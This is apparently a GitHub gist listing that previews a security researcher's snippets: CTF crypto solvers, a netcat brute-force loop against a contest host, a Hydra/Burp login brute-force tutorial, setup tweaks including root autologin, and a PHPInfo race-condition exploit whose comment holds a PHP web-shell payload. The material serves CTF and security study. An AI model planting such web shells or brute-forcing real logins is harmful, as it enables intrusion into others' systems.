intrd
@intrd
intrd / tutorial_kali_autologin_afterupdate.txt
Last active January 28, 2024 06:32
Kali light xfce4 root autologin (works after lightdm update)
## Kali light xfce4 root autologin (works after lightdm update)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
Root autologin is broken after the lightdm update; fix it by doing this:
nano /etc/lightdm/lightdm.conf
In the [Seat:*] group, uncomment/edit:
autologin-user=root
autologin-user-timeout=0
@intrd
intrd / many_time_pad_attack.py
Last active December 18, 2023 05:04
OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017
#!/usr/bin/python
## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017
# @author intrd - http://dann.com.br/
# Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py
import string
import collections
import sets, sys
# 11 unknown ciphertexts (in hex format), all encrypted with the same key
@intrd
intrd / math_bot_parser.py
Last active October 20, 2023 01:46
Math bot script - prog100-math_bot @ alexctf 2017
#!/usr/bin/python
## Math bot script - prog100-math_bot @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, time
sys.path.append("../../LIBS/")
from int_netcat import Netcat
@intrd
intrd / br_allow.sh
Last active August 15, 2023 15:33
IPtables - Rulescript to allow only Brazilian IPs
#!/bin/bash
## IPtables - Rulescript to allow only Brazilian IPs
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# Brazil
ipset -F br.zone
ipset -N br.zone nethash
for IP in $(wget -O - http://www.ipdeny.com/ipblocks/data/countries/br.zone)
do ipset -A br.zone $IP
@intrd
intrd / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Last active June 27, 2023 15:57
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewriting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewriting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewriting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters.
Create a macro rule over method GET, extract a custom parameter w/ parameter name = _csrf,
extraction starting after the expression value=" and ending at the delimiter ". Configure the scope for the domain and enable it for Proxy.
Open session tracker to test. (On an Intruder bruteforce, you need to untick Make unmodified baseline request.)
- Proxy options = Enable Cookie jar for proxy; if that does not work, enable invisible proxying
@intrd
intrd / tutorial_disk_encryption.txt
Last active April 26, 2023 12:26
Tutorial - Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
## Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
# @author intrd - http://dann.com.br/
Why not full disk encryption?
This setup is for systems that need performance.
Tried on an Ubuntu system w/ an existing user.
as root:
# apt-get install ecryptfs-utils cryptsetup
# apt-get install lsof
@intrd
intrd / rsa_egcd.py
Last active July 16, 2022 05:32
RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
#!/usr/bin/python
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import binascii, base64
p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
@intrd
intrd / nc_bruteforce.sh
Last active June 28, 2022 08:41
Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
#!/bin/bash
## Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
for letter in {A..Z} ; do
echo $letter
sleep 1
(echo "yes" & sleep 1 & echo "$letter") | nc -i1 -w5 54.175.35.248 8002
done
@intrd
intrd / vpn_intrd.sh
Last active June 14, 2022 05:07
Openvpn safe kill switch / isolate vpn connection using linux routing table (no iptables needed)
#!/bin/bash
## Openvpn safe kill switch / isolate vpn connection using linux routing table (no iptables needed)
# Author: intrd@dann.com.br
# flush the entire routing table (incl cache)
sudo ip route flush table main
sudo ip route flush cache
# route the wan network but not a gateway
@intrd
intrd / phpinfo_exploit.py
Last active March 29, 2022 19:53
PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## passwords.txt payload content
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re
from subprocess import Popen, PIPE, STDOUT